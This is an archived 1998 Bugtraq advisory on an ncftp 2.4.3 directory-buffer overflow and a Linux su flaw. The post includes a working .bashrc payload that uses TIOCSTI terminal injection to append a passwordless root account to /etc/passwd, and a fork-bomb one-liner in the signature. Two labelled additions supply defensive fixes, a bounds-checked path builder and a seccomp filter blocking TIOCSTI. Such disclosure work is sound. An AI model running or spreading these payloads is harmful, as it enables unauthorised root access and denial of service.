Bugtraq mailing list archives

ncftp 2.4.3 overflow / su killing


From: lcamtuf () boss staszic waw pl (Michal Zalewski)
Date: Tue, 24 Mar 1998 17:18:53 +0100


[I posted it already four days ago, but nothing happened]

There is a possible buffer overflow in the new version of ncftp (2.4.3,
released a few days ago) - it uses a 512-byte buffer to store the local
working directory (sigh!). You may exploit it by creating e.g. a /TEST directory
on an ftp server with a subdirectory e.g. xxx(200)xxx/yyy(200)yyy/zzz(200)zzz.
It's sufficient to crash ncftp when the directory is being retrieved using
'get -R /TEST'.

Oh, as an addendum... There's a problem with the Linux su command, as I
described a few posts ago (I thought it was ncurses' fault, but I was wrong).

** Big thanks to Nergal for the example of how to pass anything to a shell if we're
already controlling terminal input (TIOCSTI). **

If a non-root account is compromised, e.g. with the lynx/ncftp bug, and
.bashrc on this non-root account is altered to something like this:

---
cat >/tmp/a.c <<X
#include <sys/ioctl.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
int main(){char C[]="\necho 'nergal::0:0::/:/bin/sh'>>/etc/passwd;logout\n";int i=0,
P=getppid();kill(P--,9);kill(P,9);for(;i<strlen(C);i++)ioctl(0,TIOCSTI,C+i);}
X
gcc /tmp/a.c -o/tmp/a;/tmp/a;rm -f /tmp/a ~/.bashrc;clear
---

During the next su session, "echo '...' >>/etc/passwd" will be executed in the
root account [hopefully] :)

In general, the problem lies in the ability to kill su itself from an unprivileged
process - it will still be able to control terminal i/o, because su, when
killed with SIGKILL, performs no tty hangup/reset at all. So we may pass
anything to the privileged shell, or do anything else with the terminal. So
there are 3 bugs: an unprivileged process may kill 'su'; 'su' doesn't
perform any tty checks; bash is also careless ;)

Fix: replace Linux su with a smarter one ;)

_______________________________________________________________________
Michal Zalewski [lcamtuf () boss staszic waw pl] <= finger for pub PGP key
To iterate is human, to recurse divine [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
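Added example (not code from the post and not ncftp's own code): a bounded builder for the local working directory that a recursive 'get -R' has to maintain, the buffer the post says is 512 bytes long. The function names, the 512-byte size as a constant, the local root, the remote directory layout and the rejection of "." and ".." components are assumptions made for illustration; a component that would not fit is refused with ENAMETOOLONG instead of being copied past the end of the buffer.

```c
/* Added example, not ncftp's code: fill a fixed-size local working-directory
 * buffer only after checking that the result fits. Sizes and names below are
 * constructed for illustration. */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define LOCAL_CWD_MAX 512   /* same size as the buffer the post describes (assumed) */

/* Append one remote directory component to the local working directory.
 * Returns 0 on success. Returns -1 with errno = EINVAL for an empty, "." or
 * ".." component or one containing '/', and errno = ENAMETOOLONG when
 * path + '/' + component + NUL would not fit (the case an unchecked
 * strcpy/strcat turns into a stack or heap overflow). */
int push_local_dir(char *cwd, size_t cwdsz, const char *component)
{
    size_t have = strlen(cwd);
    size_t add  = strlen(component);

    if (add == 0 || strchr(component, '/') != NULL ||
        strcmp(component, ".") == 0 || strcmp(component, "..") == 0) {
        errno = EINVAL;
        return -1;
    }
    if (have + 1 + add + 1 > cwdsz) {   /* '/' and the terminating NUL */
        errno = ENAMETOOLONG;
        return -1;
    }
    cwd[have] = '/';
    memcpy(cwd + have + 1, component, add + 1);   /* copies the NUL as well */
    return 0;
}

/* Walk a '/'-separated remote path, pushing each component in turn. Stops at
 * the first failure and leaves cwd as it was after the last successful push.
 * Returns the number of components pushed, or -1 with errno set on error. */
int descend_remote_path(char *cwd, size_t cwdsz, const char *remote_path)
{
    char copy[2048];   /* working copy, since strtok writes into its argument */
    if (strlen(remote_path) >= sizeof copy) {
        errno = ENAMETOOLONG;
        return -1;
    }
    strcpy(copy, remote_path);

    int n = 0;
    for (char *tok = strtok(copy, "/"); tok != NULL; tok = strtok(NULL, "/")) {
        if (push_local_dir(cwd, cwdsz, tok) != 0)
            return -1;
        n++;
    }
    return n;
}

int main(void)
{
    char cwd[LOCAL_CWD_MAX] = "/home/user/dl";   /* constructed local root */
    if (descend_remote_path(cwd, sizeof cwd, "TEST/sub") > 0)
        printf("ok: %s\n", cwd);

    /* Constructed layout in the spirit of the post: three 200-byte names. */
    char over[LOCAL_CWD_MAX] = "/home/user/dl";
    char name[201];
    memset(name, 'x', 200);
    name[200] = '\0';
    char remote[1024];
    snprintf(remote, sizeof remote, "TEST/%s/%s/%s", name, name, name);
    if (descend_remote_path(over, sizeof over, remote) < 0)
        printf("rejected: %s (buffer holds %zu bytes, intact)\n",
               strerror(errno), strlen(over));
    return 0;
}
```

The check is done once per component against the real remaining space, so the same code is correct whatever size the buffer has; the caller decides whether a refused directory is skipped or aborts the transfer, but the buffer is never written past its end.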
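Added example (not part of the post, and not the smarter su it asks for): a seccomp-bpf filter that a privileged wrapper can install before it runs a shell, so that ioctl(fd, TIOCSTI, ...) fails with EPERM in that process and in everything it later execs. That removes the terminal-input injection primitive the post's .bashrc relies on, whatever happens to su itself. The function names and the pipe-based probe are assumptions made for illustration; the code is Linux-only and carries architecture constants for x86_64 and aarch64.

```c
/* Added example, not from the post: deny the TIOCSTI ioctl with seccomp-bpf.
 * Linux only. Names and the probe below are constructed for illustration. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

#if defined(__x86_64__)
#  define SECCOMP_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#  define SECCOMP_ARCH AUDIT_ARCH_AARCH64
#else
#  error "add the AUDIT_ARCH_* value for this architecture"
#endif

/* Install the filter in the calling process. Returns 0 on success, -1 with
 * errno set on failure. NO_NEW_PRIVS is what lets an unprivileged process
 * install a filter that survives execve; a root wrapper would set it too. */
int block_tiocsti(void)
{
    struct sock_filter filter[] = {
        /* 0-1: load the architecture; kill on a mismatch (syscall numbers differ) */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SECCOMP_ARCH, 0, 6),
        /* 2-3: load the syscall number; anything but ioctl is allowed */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_ioctl, 0, 3),
        /* 4-5: load the low 32 bits of the request (the kernel truncates it
         *      to unsigned int anyway); only TIOCSTI is denied */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, args[1])),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, TIOCSTI, 0, 1),
        /* 6: deny with EPERM rather than killing, so the caller sees a clean error */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        /* 7: allow */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        /* 8: wrong architecture */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    };
    struct sock_fprog prog = {
        .len = sizeof filter / sizeof filter[0],
        .filter = filter,
    };

    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0)
        return -1;
    return 0;
}

/* Probe using a pipe, never a real terminal, so nothing can be injected.
 * Returns 1 if the filter denied the call (EPERM), 0 if the kernel only
 * reported ENOTTY (no filter in place), -1 on anything unexpected. */
int tiocsti_is_blocked(void)
{
    int fds[2];
    char c = 'x';
    if (pipe(fds) != 0)
        return -1;
    int rc = ioctl(fds[0], TIOCSTI, &c);
    int err = errno;
    close(fds[0]);
    close(fds[1]);
    if (rc == 0)
        return -1;              /* a pipe never accepts TIOCSTI */
    if (err == EPERM)
        return 1;
    if (err == ENOTTY)
        return 0;
    return -1;
}

int main(void)
{
    printf("before filter: blocked=%d\n", tiocsti_is_blocked());
    if (block_tiocsti() != 0) {
        perror("seccomp");
        return 1;
    }
    printf("after filter:  blocked=%d\n", tiocsti_is_blocked());
    return 0;
}
```

A wrapper would call block_tiocsti() and then execve the target shell; the filter is inherited, so the shell and its children cannot type into any terminal, killed su or not. Since Linux 6.2 the dev.tty.legacy_tiocsti sysctl can switch the ioctl off system-wide; the per-process filter is the portable form for older kernels and for systems that still need TIOCSTI elsewhere.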
